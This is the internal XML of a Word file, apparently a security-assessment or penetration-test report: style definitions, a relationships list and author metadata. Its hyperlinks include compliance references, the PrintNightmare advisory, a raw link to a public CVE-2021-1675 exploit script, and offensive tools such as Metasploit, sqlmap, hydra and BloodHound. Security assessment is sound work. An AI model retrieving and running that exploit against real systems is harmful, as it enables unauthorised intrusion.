    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="4472C4" w:themeColor="accent1" w:sz="4" w:space="10"/>
        <w:bottom w:val="single" w:color="4472C4" w:themeColor="accent1" w:sz="4" w:space="10"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="360"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0FB6339A"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>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&#65279;<?xml version="1.0" encoding="utf-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId3" /><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="people.xml" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" Id="rId6" /><Relationship Type="http://schemas.microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml" Id="rId28" /><Relationship Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId4" /><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.xml" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://listings.pcisecuritystandards.org/documents/PCI_DSS-QRG-v3_2_1.pdf" TargetMode="External" Id="Rcd5797ceabc340a5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.aicpa.org/InterestAreas/FRC/AssuranceAdvisoryServices/Pages/AICPASOC2Report.aspx" TargetMode="External" Id="Re950d29b7624496e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.checkpoint.com/cyber-hub/cyber-security/what-is-soc-2-compliance/" TargetMode="External" Id="R17f8fecdf0d14e2e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" TargetMode="External" Id="R321c81f7489f4a39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py" TargetMode="External" Id="Rd67b554ca80d46b4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blank" TargetMode="External" Id="R174f7ea41e244b89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="Rf48112ec1bf14af2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R9564777146d54ee5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/metasploit-framework" TargetMode="External" Id="Reaa6a66c5ed44b35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/communitydownload" TargetMode="External" Id="R9f3fa76ec5684361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/nmap" TargetMode="External" Id="R138c9367a5154fad" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases" TargetMode="External" Id="Ra2b3b2bea1ef46f0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/dirbuster" TargetMode="External" Id="R874a8fc0411042a5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/releases" TargetMode="External" Id="R49a941cabe874458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlmapproject/sqlmap/releases" TargetMode="External" Id="R4e2ad7d6096344e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/crackmapexec" TargetMode="External" Id="Rebc550bf3cb246e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/hydra" TargetMode="External" Id="Rfde910a4810d4b39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD" TargetMode="External" Id="R7a6130571bdc436a"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CayhCd5IrIwKSXVunEQQXQekN8A==">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</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creator>Stanley Hammer</dc:creator>
  <lastModifiedBy>Alexander Tong</lastModifiedBy>
  <revision>4</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-24T13:52:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-26T00:53:54.4845227Z</dcterms:modified>
</coreProperties>
</file>